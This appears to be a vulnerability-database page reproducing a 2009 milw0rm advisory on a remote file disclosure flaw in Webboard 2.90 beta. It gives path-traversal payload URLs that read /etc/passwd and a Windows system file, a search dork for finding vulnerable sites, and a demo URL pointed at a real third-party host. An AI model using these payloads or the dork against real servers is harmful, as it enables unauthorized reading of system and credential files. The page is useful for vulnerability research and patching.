Lucene search
K

Webboard <= 2.90 beta - Remote File Disclosure Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 13 Views

Webboard v.2.90 beta Remote File Disclosure Vulnerability, 3 vulnerable calls to fopen(

Code

                                                Webboard &#60;= v.2.90 beta Remote File Disclosure Vulnerability

=============================================================

Author: MrDoug
Email: mrdoug13 [at] gmail [dot] com

Greetz to all my friends

=============================================================

There are 3 vulnerable calls to fopen() in &#34;/webboard/view.php&#34;
They are on lines 7, 109 and 113.  I have not actually read the
source but based on tests I would GUESS they look something
like this...


  7: fopen(&#39;title/&#39; . $_GET[&#39;topic&#39;] . &#39;.txt&#39;);

...

109: fopen(&#39;counter/read/&#39; . $_GET[&#39;topic&#39;] . &#39;.txt&#39;);

...

113: fopen(&#39;counter/read/&#39; . $_GET[&#39;topic&#39;] . &#39;.txt&#39;);


IMPORTANT:
Due to the trailing &#34;.txt&#34;, retrieving files with different
extensions will be difficult unless you are able to get a
null byte through without it being escaped.

=============================================================

Example 1: /webboard/view.php?topic=../../../../../../etc/passwd%00
Example 2: /webboard/view.php?topic=../../../../../../WINDOWS/system32/eula

Dork: inurl:&#34;webboard/view.php?topic=&#34;

Demo: http://korat.nfe.go.th/ksn00/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula

# milw0rm.com [2009-05-29]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
13